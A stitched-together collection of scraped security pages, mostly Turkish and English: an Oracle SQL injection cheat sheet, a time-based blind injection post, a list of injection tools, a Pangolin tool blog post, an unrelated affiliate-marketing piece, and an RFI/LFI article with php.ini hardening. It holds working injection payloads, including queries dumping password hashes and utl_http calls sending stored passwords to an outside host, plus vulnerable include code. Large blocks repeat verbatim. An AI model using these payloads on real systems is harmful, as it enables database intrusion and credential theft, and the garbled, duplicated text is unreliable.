Getting Tables
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'
Getting Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Getting Current Database Name
SELECT global_name FROM global_name
Getting Users and Passwords
SELECT name, password FROM sys.user$ where type#=1
Getting version
Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'
Getting Current User
SELECT user FROM dual
Simple Union Query
http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL
Simulating SQL Server's TOP feature
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;
Moving Records one by one
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;
Functions useful for Blind SQL Injetion
* BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds
* CHR() - Convert to Char
* ASCII() - Convert to ASCII
* SUBSTR() - Substring
* BITAND() - Bit And operation
* LOWER() - Convert to LowerCase
Doing outbound connections
* SELECT utl_http.request('http://www.example.com') FROM DUAL SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members) ) FROM DUAL
* SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;
You can test blind SQL Injection from DNS requests (can be more reliable against egress filtering) or from actual web request.
References, Papers & Credits
* Thanks to Pentestmonkey, Notsosecure, Alexander Kornbrust
* SQL Injection Attacks for ORACLE Developers
* Red Database Security Papers
* SQL Injection Cheat Sheet
Document History
* 02/10/2007 - Public Release
* 02/10/2007 - Getting passwords section and utl_http replaced with new and easier ones. Thanks to Alexander Kornbrust
* 09/10/2007 - Sleep function added
Zaman Tabanlı Full-Blind SQL Injection
ull Blind SQL Injection (çıktıda hiç değişiklik oluşturmayan SQL Injectionlar) popüler konularımızdan biri. Her ne kadar MySQL, ORACLE, SQL Server, PostgreSQL de rahatça takılabilsekte MS Access gibi acayip ve genelde tırt veritabanlarına gelince takılıyoruz.
Çünkü genelde çoğu veritabanı, SLEEP ya da WAITFOR DELAY gibi fonksiyonlar ile zaman tabanlı ataklar yapmamızı sağlarken MS Access gibi veritabanlarında bu imkanımız yok.
Diğer bir örnek ise MySQL ve BENCHMARK. MySQL zaman tabanlı SQL Injection atakları yapmak için BENCHMARK' ı kullanabiliyoruz ve basitçe veritabanında uzun süren herhangi bir iş yapıyor ve çıktının kaç saniyede üretildiğine bakıp açığı exploit edebiliyoruz.
Chema Alonso BENCHMARK yerine çok uzun sürecek SQL queryleri çalıştırarak her veritabanında çalışabilecek bir zaman tabanlı SQL Injection yöntemi geliştirmiş.
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
BENCHMARK ya da bu yöntem şiddetle kaçınılmalı ve SQL Injectionlarda en son yöntem olarak başvurulmalı. Nedeni basit, serverın CPU' sunu aşırı derecede harcamış olacaksınız. Dolayısıyla server cevap vermeyebilir ya da ilginç hatalar almaya başlabilirsiniz.
Çünkü genelde çoğu veritabanı, SLEEP ya da WAITFOR DELAY gibi fonksiyonlar ile zaman tabanlı ataklar yapmamızı sağlarken MS Access gibi veritabanlarında bu imkanımız yok.
Diğer bir örnek ise MySQL ve BENCHMARK. MySQL zaman tabanlı SQL Injection atakları yapmak için BENCHMARK' ı kullanabiliyoruz ve basitçe veritabanında uzun süren herhangi bir iş yapıyor ve çıktının kaç saniyede üretildiğine bakıp açığı exploit edebiliyoruz.
Chema Alonso BENCHMARK yerine çok uzun sürecek SQL queryleri çalıştırarak her veritabanında çalışabilecek bir zaman tabanlı SQL Injection yöntemi geliştirmiş.
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
BENCHMARK ya da bu yöntem şiddetle kaçınılmalı ve SQL Injectionlarda en son yöntem olarak başvurulmalı. Nedeni basit, serverın CPU' sunu aşırı derecede harcamış olacaksınız. Dolayısıyla server cevap vermeyebilir ya da ilginç hatalar almaya başlabilirsiniz.
En iyi 15 SQL Injection Tools
SQLIer – SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Get SQLIer.
SQLbftools – SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.
SQL Injection Brute forcer – SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.
SQLBrute – SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.
BobCat – BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.
SQLMap – SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.
Absinthe – Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.
SQL Injection Pen-testing Tool - The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.
SQID – SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.
Blind SQL Injection Perl Tool – bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.
SQL Power Injector - SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. Get SQL Power Injection.
FJ-Injector Framwork – FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework.
SQLNinja – SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. Get SQLNinja.
Automagic SQL Injector – The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. Get Automagic SQL Injector.
NGSS SQL Injector – NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector.
SQLbftools – SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.
SQL Injection Brute forcer – SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.
SQLBrute – SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.
BobCat – BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.
SQLMap – SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.
Absinthe – Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.
SQL Injection Pen-testing Tool - The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.
SQID – SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.
Blind SQL Injection Perl Tool – bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.
SQL Power Injector - SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. Get SQL Power Injection.
FJ-Injector Framwork – FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework.
SQLNinja – SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. Get SQLNinja.
Automagic SQL Injector – The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. Get Automagic SQL Injector.
NGSS SQL Injector – NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector.
Web Application Testing with Pangolin (Video & Screenshot)
Here is another new video “[1] Web Application Testing with Pangolin” (1024×768).
Similar to the previous video with [2] Matrixay I am using a chinese tool called Pangolin to extract the structure and content of a database (tables, columns, data) via a SQL Injection vulnerability in one of my vulnerable test applications.
Pangolin is a free product but some of the versions of Pangolin on the web are coming with a backdoored libcurl.dll. This can be a dangerous side effect of using free tools in a company environment. You have been warned…
Sometimes it is difficult to find a download possibility of Pangolin because the main website [3] www.nosec.org is currently under construction but if you search a little bit you will be able to find a copy (e.g. via rapidshare). More details concerning Pangolin is available [4] here.
[5] Pangolin Web SQL Injection Tool
Pangolin supports all kind of databases (Oracle, MSSQL, MySQL, Sybase, DB2, …).
More videos can be found in our [6] video section.
Dieser Artikel wurde ausgedruckt ab Alexander Kornbrust Oracle Security Blog: http://blog.red-database-security.com
URL zum Artikel: http://blog.red-database-security.com/2009/03/05/web-application-testing-with-pangolin-video-screenshot/
URLs in this post:
[1] Web Application Testing with Pangolin: http://www.red-database-security.com/videos/pangolin/webapp_testing_with_pangoli
n.html
[2] Matrixay: http://www.dbappsecurity.com/
[3] www.nosec.org: http://www.nosec.org/
[4] here: http://forum.darkc0de.com/index.php?action=vthread&forum=7&topic=5858
[5] Image: http://www.red-database-security.com/screenshot/pangolin.jpg
[6] video section: http://www.red-database-security.com/videos/oracle_videos.html
Similar to the previous video with [2] Matrixay I am using a chinese tool called Pangolin to extract the structure and content of a database (tables, columns, data) via a SQL Injection vulnerability in one of my vulnerable test applications.
Pangolin is a free product but some of the versions of Pangolin on the web are coming with a backdoored libcurl.dll. This can be a dangerous side effect of using free tools in a company environment. You have been warned…
Sometimes it is difficult to find a download possibility of Pangolin because the main website [3] www.nosec.org is currently under construction but if you search a little bit you will be able to find a copy (e.g. via rapidshare). More details concerning Pangolin is available [4] here.
[5] Pangolin Web SQL Injection Tool
Pangolin supports all kind of databases (Oracle, MSSQL, MySQL, Sybase, DB2, …).
More videos can be found in our [6] video section.
Dieser Artikel wurde ausgedruckt ab Alexander Kornbrust Oracle Security Blog: http://blog.red-database-security.com
URL zum Artikel: http://blog.red-database-security.com/2009/03/05/web-application-testing-with-pangolin-video-screenshot/
URLs in this post:
[1] Web Application Testing with Pangolin: http://www.red-database-security.com/videos/pangolin/webapp_testing_with_pangoli
n.html
[2] Matrixay: http://www.dbappsecurity.com/
[3] www.nosec.org: http://www.nosec.org/
[4] here: http://forum.darkc0de.com/index.php?action=vthread&forum=7&topic=5858
[5] Image: http://www.red-database-security.com/screenshot/pangolin.jpg
[6] video section: http://www.red-database-security.com/videos/oracle_videos.html
AFFILIATE MARKETING NEDIR, NASIL İŞLER?
Affiliate Marketing en çok rağbet gören internet işlerinden ve en kolay online para kazanma yöntemlerinden biridir. Bir Affiliate Marketing işine sahip olmak sizi hayal bile edemediğiniz bir servete götürebilir.
Affiliate Marketing, tüccar ile web sitesi sahibinin kendi sitesinde, tüccarın ürünlerini bir hyperlink ile pazarlaması üzerine yapılan bir anlaşma olarak tanımlanabilir. Tüccar, web sitesi sahibinin sitesindeki linkin tıklanması suretiyle gerçekleşen satışlardan site sahibine belli bir % komisyon öder. Affiliate Marketing programları hem affiliate (katılımcı) hem de tüccar için her iki tarafın da çeşitli faydalar sağladığı bir kazan-kazan durumudur. Tüccar (ürün sahibi) bu yöntemi tercih etiğinde malının daha geniş bir pazarda pazarlanmasına ve başka reklam yöntemleri ile ulaşılması mümkün olmayan seviyede malın piyasada yer almasını sağlamaktadır. Affiliate katılımcı sayısı ve affiliate web siteleri arttıkça , daha fazla internet trafiği arttıkça satış miktarı da artacaktır. Öte yandan affiliate (katılımcı) ise sadece kendi web sitesinden tüccarın websitesine bir link yada banner koymak suretiyle bu yolla oluşacak her satıştan bir komisyon kazanmaktadır. Ürün hazır olduğundan affiliate(katılımcı)nın yapması gereken tek şey satış konusu ürüne online olarak potansiyel müşteriler bulmaktır.
Affiliate Marketing en mükemmel evden para kazanma yöntemlerinden biridir. Böylece evinizde olmanın rahatlığı içinde online olarak affiliate işini başarılı bir biçimde yürütebilirsiniz. Affiliate programların birçoğunda başlangıç maliyeti bulunmamaktadır. Bu tür programların çoğunda harika pazarlama araçları ve teknik destek servisi bulunduğu için bu işe başlamak için tecrübeli olmanız dahi gerekmemektedir. Affiliate programların hemen hepsinde affiliate katılımcıya ücretsiz bir web sitesi de sağlanmaktadır.Ayrıca ürün stoku, ürünün satış işlemlerinin tamamlanarak alıcıya gönderilmesi gibi konularda da endişelenmeniz gerekmez çünkü bunların hepsi tüccarın sorumluluğu altındadır.
Aşağıdaki banner'da Cashburners Affiliate Programından elde ettiğim kazanç gösterilmektedir. Cashburners' a ücretsiz olarak katılmak için banner'ı tıklayın.
Affiliate Marketing, tüccar ile web sitesi sahibinin kendi sitesinde, tüccarın ürünlerini bir hyperlink ile pazarlaması üzerine yapılan bir anlaşma olarak tanımlanabilir. Tüccar, web sitesi sahibinin sitesindeki linkin tıklanması suretiyle gerçekleşen satışlardan site sahibine belli bir % komisyon öder. Affiliate Marketing programları hem affiliate (katılımcı) hem de tüccar için her iki tarafın da çeşitli faydalar sağladığı bir kazan-kazan durumudur. Tüccar (ürün sahibi) bu yöntemi tercih etiğinde malının daha geniş bir pazarda pazarlanmasına ve başka reklam yöntemleri ile ulaşılması mümkün olmayan seviyede malın piyasada yer almasını sağlamaktadır. Affiliate katılımcı sayısı ve affiliate web siteleri arttıkça , daha fazla internet trafiği arttıkça satış miktarı da artacaktır. Öte yandan affiliate (katılımcı) ise sadece kendi web sitesinden tüccarın websitesine bir link yada banner koymak suretiyle bu yolla oluşacak her satıştan bir komisyon kazanmaktadır. Ürün hazır olduğundan affiliate(katılımcı)nın yapması gereken tek şey satış konusu ürüne online olarak potansiyel müşteriler bulmaktır.
Affiliate Marketing en mükemmel evden para kazanma yöntemlerinden biridir. Böylece evinizde olmanın rahatlığı içinde online olarak affiliate işini başarılı bir biçimde yürütebilirsiniz. Affiliate programların birçoğunda başlangıç maliyeti bulunmamaktadır. Bu tür programların çoğunda harika pazarlama araçları ve teknik destek servisi bulunduğu için bu işe başlamak için tecrübeli olmanız dahi gerekmemektedir. Affiliate programların hemen hepsinde affiliate katılımcıya ücretsiz bir web sitesi de sağlanmaktadır.Ayrıca ürün stoku, ürünün satış işlemlerinin tamamlanarak alıcıya gönderilmesi gibi konularda da endişelenmeniz gerekmez çünkü bunların hepsi tüccarın sorumluluğu altındadır.
Aşağıdaki banner'da Cashburners Affiliate Programından elde ettiğim kazanç gösterilmektedir. Cashburners' a ücretsiz olarak katılmak için banner'ı tıklayın.
Nasıl Affiliate Olabilirim?
Affiliate olmak çok basit.
E-ticaret portallarının programlarına veya affiliate program network'une, reklamajans gibi üyelik formunu doldurarak başlayabilirsiniz.
Formda size kişisel bilgileriniz, isminiz,adresiniz ve tercih ettiğiniz ödeme seçenekleri sorulacaktır. Hatta sitenizin ziyaretçi bilgileri, profil bilgileri gibi sitenizin özelliklerine yönelikte sorular sorulabilir. Büyük ihtimalle bir şartnameyi kabul etmeniz gerektiğine dair de check boz olacaktır.
Onaylama hemen de olabilir bir kaç hafta da sürebilir. Affiliate program yöneticileri sitenizi inceliyor veya gözlüyor olabilir.
Siteniz onaylandıktan sonra, artık affiliate olarak pazarlama yapmaya hazırsınız demektir. Bunun için gerekli reklam araçlarını da zaten size reklamveren (iş ortağı) verecektir. Reklamaraçları textlink, banner(gif),html, pop-up banner ve flash banner olabilir
E-ticaret portallarının programlarına veya affiliate program network'une, reklamajans gibi üyelik formunu doldurarak başlayabilirsiniz.
Formda size kişisel bilgileriniz, isminiz,adresiniz ve tercih ettiğiniz ödeme seçenekleri sorulacaktır. Hatta sitenizin ziyaretçi bilgileri, profil bilgileri gibi sitenizin özelliklerine yönelikte sorular sorulabilir. Büyük ihtimalle bir şartnameyi kabul etmeniz gerektiğine dair de check boz olacaktır.
Onaylama hemen de olabilir bir kaç hafta da sürebilir. Affiliate program yöneticileri sitenizi inceliyor veya gözlüyor olabilir.
Siteniz onaylandıktan sonra, artık affiliate olarak pazarlama yapmaya hazırsınız demektir. Bunun için gerekli reklam araçlarını da zaten size reklamveren (iş ortağı) verecektir. Reklamaraçları textlink, banner(gif),html, pop-up banner ve flash banner olabilir
RFI-LFI Security - AKINCILAR
Remote File Include Attack Methods
File Inclusion atakları, genel bir tabir olmasına rağmen çoğunlukla PHP mimarisi üzerine kurulu sistemlerde karşımıza çıkmaktadır. Gerek sistemi tasarlayıp inşa eden yazılımcının deneyimsiz oluşu, gerek PHP`nin yapısının güvenlik zafiyetlerine müsait oluşu ve gerekse yazılımcıların güvenlik tarafını hafife almaları, güvenlik açıklarıyla sık olarak karşılaşmamıza sebep olmaktadır ve File Inclusion atakları, hem remote olarak hem de local olarak yapılabileceği için iki türlü de sistem zarar görmektedir.
Sistemlerinizin zarar görmemesi için, göreceği zararı en aza indirgemek için bu atakların nasıl yapıldığını göstermeye çalışıp, korunma yollarından bahsedeceğim.
File Include Açıkları Nasıl Oluşur?
Yukarıda da bahsettiğim gibi, kullandığınız dilin mimarisi bu açıkların oluşmasına farklı nitelikte zeminler hazırlayabilir. Ama bu hususa en çok PHP yazılımcılarının dikkat etmesi gerekmektedir. Dilin mimarisinin esnekliği ve open source bir teknoloji olması nedeniyle, tüm yükümlülük yazılımcıya düşmekte ve yazılımcının sistem tarafında alacağı önlemler ile bu ataklar etkisiz kılınabilmektedir.
Şimdi FI ataklarını mümkün kılan kodlara göz atalım;
Files
$page = $_GET[page];
include($page);
?>
Burada görüldüğü üzere $page değişkeni veya değişkenin aldığı değerler hiçbir filtrelemeye tabi tutulmadan direkt olarak web sayfasına yönlendirilmektedir. (Kesinlikle Formlar ve QueryStringler arası geçişte kullandığınız değişkenlerden aldığınız değerleri filtrelemeden kullanmayın)
Kullanıcılar Files linkine tıkladığında index.php?page=file1.php gibi bir linke yönlenecek ve URL bu hali alacaktır. File1.php sayfası, index.php sayfasının kullandığı “page” parametresi üzerinden sayfaya include edildiğinden ve bu değişkenin aldığı değer kontrol edilip filtrelenmediğinden dolayı bu değişken üzerinden sisteminize yapılacak FI ataklarından, sizin açınızdan olumsuz olsa da, başarılı sonuçlar alınacaktır.
File Include Atakları Nasıl Yapılır ?
Senaryomuzdan devam edecek olursak;
$page değişkeninin aldığı değeri kontrol etmediğimizden dolayı, bu değişkene istediğimiz her değeri atayabiliriz. Eğer sisteminiz bir *nix sunucu da barınıyorsa, çeşitli PHP fonksiyonlarını içeren dosyamızı değişkene atayarak sistemde PHP komutları çalıştırabilir ki bu Remote File Inclusion olarak geçmektedir. Ya da *nix sunuculara has komutları bu değişken üzerinden çalıştırıp, sisteminiz ve bulunduğunuz server hakkında kritik bilgilere ulaşılabilir ki bu da Local File Inclusion atakları olarak isimlendirilmektedir.
Ayrıca, ileri düzey FI yöntemlerine değinecek olursak;
- SecurePHP kullanan sistemlerde, FI zafiyeti bulunsa dahi HTTP protokolü üzerinden sayfalar include edilememektedir. Bu bir nevi geçici bir çözüm olsa bile, SecurePHP`nin yanlış yapılandırılması nedeniyle HTTP protokolü yerine FTP protokolü üzerinden sayfalar include edilebilmektedir.
- Ayrıca PHP5 kullanan ve FI zafiyeti mevcut olan sistemlerde, yerel ağ üzerinden herhangi bir bilgisayarın IP numarası yardımıyla, o bilgisayardan bir dosya include etmekte mümkündür.
Gelişmiş ve etkili olabilecek FI yöntemlerine değinmiş bulunduk, çözümlerinizi bu çerçevede geliştirmeniz atakları tamamen engellemenizi sağlayacaktır.
File Include Ataklarından Nasıl Korunulur ?
Açıkların nasıl oluştuğunu ve atakların nasıl düzenlenebileceğini kavradığınız zaman, yapmanız gerekenler şunlardır;
- Kullanıcıdan aldığınız verileri ve input alanlarını filtreleyiniz ve değişkenlere öyle atama yapınız.
- SecurePHP güvenlik sistemini kullanınız.
- php.ini yapılandırmanızı iyi yapınız.
- Server kullanıcı grupları permissionlarını ayarlamayı unutmayınız.
Server üzerinde alınması gereken önlemler ?
(Remote File Include) attacklarından kısmen korunmak için;
"php.ini" yapılandırmasına geçmeden önce sunucumuzda bulunan klasör ve dosya izinlerini "chmod" doğru şekilde ayarlayalım. Genelde FTP programlarında dosya yada klasör üzerine "sağ click" yapılıp yada "file" seçeneğinden "Change Attributes ya da Properties / CHMOD" seçeneklerinden düzenleriz burada "permissions" altında yani izinler altında önerilenleri girmek en uygunudur.
Klasörler için: 755
Dosyalar için: 644
İzinleri bu şekilde ayarlamanız güvenlik için ilk adımı atmanıza yardımcı olur.
"php.ini" yapılandırması:
Eğer server admini iseniz yani root yetkilere sahipseniz bu ayarları serverda bulunan tüm siteler için yapabilirsiniz genellikle "/usr/local/Zend/etc/" , "/usr/local/lib/" altında bulunur "php.ini" dosyasını açarak düzenleyebilirsiniz veya "httpd.conf" dosyasının doğru yapılandırılmasıyla da olur. Daha sonra apache’ye restart atmanız gerekmektedir.
Root değilseniz sadece kendi siteniz için yapmanız gerekiyorsa kök dizininizde (public_html) bir "php.ini" dosyası oluşturarak veya varolan "php.ini" dosyasının içerisine altta verdiğim kodları ekleyerek güvenliğinizi sağlayabilirsiniz. Fakat sitenizle aynı serverda bulunan diğer sitelerden kaynaklanan açıklardan yararlanan kişiler root olmayı başarırlarsa burada anlatılanlar yetersiz kalır, root olmayı başaramazlarsa ve sitenizin şifrelerini kaptırmazsanız güvendesinizdir.
Altta anlattığım bilgiler iyi bir güvenlik için yapılması gerekenler olduğundan dolayı bunları uyguladıktan sonra bazı scriptlerinizin çalışması engellenmiş olabilir. Ama scriptin çalışmasını engelleyen değerleri iptal ederseniz script tekrar doğru şekilde çalışacaktır.
Şimdi gelelim "php.ini" yapılandırmasına:
"disable_functions" (Güvenlik)
"disable_functions" ile serverınızda birçok fonksiyonun çalışmasını engelleyebilirsiniz bu sayede sitenize inject edilen scriptler, sheller için güvenliğinizi almış olursunuz. Bu kadar fonksiyon fazla gelebilir ama iyi bir güvenlik için şart. Bu kadar sayıda devre dışı bırakılan fonksiyonlar ilk defa "*bir hainin sitesi*" adresinde verilmiştir.
Önerilen:
1-
disable_functions = foreach, glob, openbasedir, posix_getpwuid, f_open, system,dl, array_compare, array_user_key_compare, passthru, cat, exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, ini_restore, mysql_list_dbs, get_current_user, getmyuid, pconnect, link, symlink, fin, passthruexec, fileread, shell_exec, pcntl_exec, ini_alter, parse_ini_file, leak, apache_child_terminate, chown, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, allow_url_fopen, fpassthru, execute, shell, curl_exec, chgrp, stream_select, passthru, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual
Eğer bu kadar fonsiyonu devre dışı bırakmak fazla geldiyse alttaki gibi de ayarlayabilirsiniz bu da güvenliğiniz için yeterlidir:
2-
disable_functions = glob, posix_getpwuid, array_compare, array_user_key_compare, ini_restore, exec, proc_get_status, proc_nice, proc_open, allow_url_fopen, fin, pconnect, system, dl, passthruexec, shell_exec, proc_close, proc_get_status, chown, chgrp, escapeshellcmd, escapeshellarg, fileread, passthru, popen,curl_exec, shell, execute
"safe_mode" (Güvenlik)
"Safe Mode" adından da anlaşılacağı gibi "Güvenli Mod" anlamına geliyor. "Safe Mode" genelde birçok serverda "Off" durumdadır ve bu da birçok tehlikeye davetiye çıkaran unsurlar arasında yer alır. "Güvenli Modu Açık" durumuna getirmek shellerin serverımızda istedikleri gibi dolaşmalarını, exploitlerin çalıştırılmasını ve komutların execute edilmelerini önler. Günümüzde "açık olan güvenlik modunu" kapalı duruma getiren scriptler mevcut fakat altta anlatılan önlemlerle bunun da önüne geçilebilir.
Önerilen:
safe_mode = on
Not: Serveriniz de bazı scriptler de hatalar alabilirsiniz.Fakat serverin genel anlamda güvenliğini sağlamış olursunuz.Server da Root yetkisi alamayan hiçkimse sunucuya kolay kolay zarar veremeyecektir.
File Inclusion atakları, genel bir tabir olmasına rağmen çoğunlukla PHP mimarisi üzerine kurulu sistemlerde karşımıza çıkmaktadır. Gerek sistemi tasarlayıp inşa eden yazılımcının deneyimsiz oluşu, gerek PHP`nin yapısının güvenlik zafiyetlerine müsait oluşu ve gerekse yazılımcıların güvenlik tarafını hafife almaları, güvenlik açıklarıyla sık olarak karşılaşmamıza sebep olmaktadır ve File Inclusion atakları, hem remote olarak hem de local olarak yapılabileceği için iki türlü de sistem zarar görmektedir.
Sistemlerinizin zarar görmemesi için, göreceği zararı en aza indirgemek için bu atakların nasıl yapıldığını göstermeye çalışıp, korunma yollarından bahsedeceğim.
File Include Açıkları Nasıl Oluşur?
Yukarıda da bahsettiğim gibi, kullandığınız dilin mimarisi bu açıkların oluşmasına farklı nitelikte zeminler hazırlayabilir. Ama bu hususa en çok PHP yazılımcılarının dikkat etmesi gerekmektedir. Dilin mimarisinin esnekliği ve open source bir teknoloji olması nedeniyle, tüm yükümlülük yazılımcıya düşmekte ve yazılımcının sistem tarafında alacağı önlemler ile bu ataklar etkisiz kılınabilmektedir.
Şimdi FI ataklarını mümkün kılan kodlara göz atalım;
Files
$page = $_GET[page];
include($page);
?>
Burada görüldüğü üzere $page değişkeni veya değişkenin aldığı değerler hiçbir filtrelemeye tabi tutulmadan direkt olarak web sayfasına yönlendirilmektedir. (Kesinlikle Formlar ve QueryStringler arası geçişte kullandığınız değişkenlerden aldığınız değerleri filtrelemeden kullanmayın)
Kullanıcılar Files linkine tıkladığında index.php?page=file1.php gibi bir linke yönlenecek ve URL bu hali alacaktır. File1.php sayfası, index.php sayfasının kullandığı “page” parametresi üzerinden sayfaya include edildiğinden ve bu değişkenin aldığı değer kontrol edilip filtrelenmediğinden dolayı bu değişken üzerinden sisteminize yapılacak FI ataklarından, sizin açınızdan olumsuz olsa da, başarılı sonuçlar alınacaktır.
File Include Atakları Nasıl Yapılır ?
Senaryomuzdan devam edecek olursak;
$page değişkeninin aldığı değeri kontrol etmediğimizden dolayı, bu değişkene istediğimiz her değeri atayabiliriz. Eğer sisteminiz bir *nix sunucu da barınıyorsa, çeşitli PHP fonksiyonlarını içeren dosyamızı değişkene atayarak sistemde PHP komutları çalıştırabilir ki bu Remote File Inclusion olarak geçmektedir. Ya da *nix sunuculara has komutları bu değişken üzerinden çalıştırıp, sisteminiz ve bulunduğunuz server hakkında kritik bilgilere ulaşılabilir ki bu da Local File Inclusion atakları olarak isimlendirilmektedir.
Ayrıca, ileri düzey FI yöntemlerine değinecek olursak;
- SecurePHP kullanan sistemlerde, FI zafiyeti bulunsa dahi HTTP protokolü üzerinden sayfalar include edilememektedir. Bu bir nevi geçici bir çözüm olsa bile, SecurePHP`nin yanlış yapılandırılması nedeniyle HTTP protokolü yerine FTP protokolü üzerinden sayfalar include edilebilmektedir.
- Ayrıca PHP5 kullanan ve FI zafiyeti mevcut olan sistemlerde, yerel ağ üzerinden herhangi bir bilgisayarın IP numarası yardımıyla, o bilgisayardan bir dosya include etmekte mümkündür.
Gelişmiş ve etkili olabilecek FI yöntemlerine değinmiş bulunduk, çözümlerinizi bu çerçevede geliştirmeniz atakları tamamen engellemenizi sağlayacaktır.
File Include Ataklarından Nasıl Korunulur ?
Açıkların nasıl oluştuğunu ve atakların nasıl düzenlenebileceğini kavradığınız zaman, yapmanız gerekenler şunlardır;
- Kullanıcıdan aldığınız verileri ve input alanlarını filtreleyiniz ve değişkenlere öyle atama yapınız.
- SecurePHP güvenlik sistemini kullanınız.
- php.ini yapılandırmanızı iyi yapınız.
- Server kullanıcı grupları permissionlarını ayarlamayı unutmayınız.
Server üzerinde alınması gereken önlemler ?
(Remote File Include) attacklarından kısmen korunmak için;
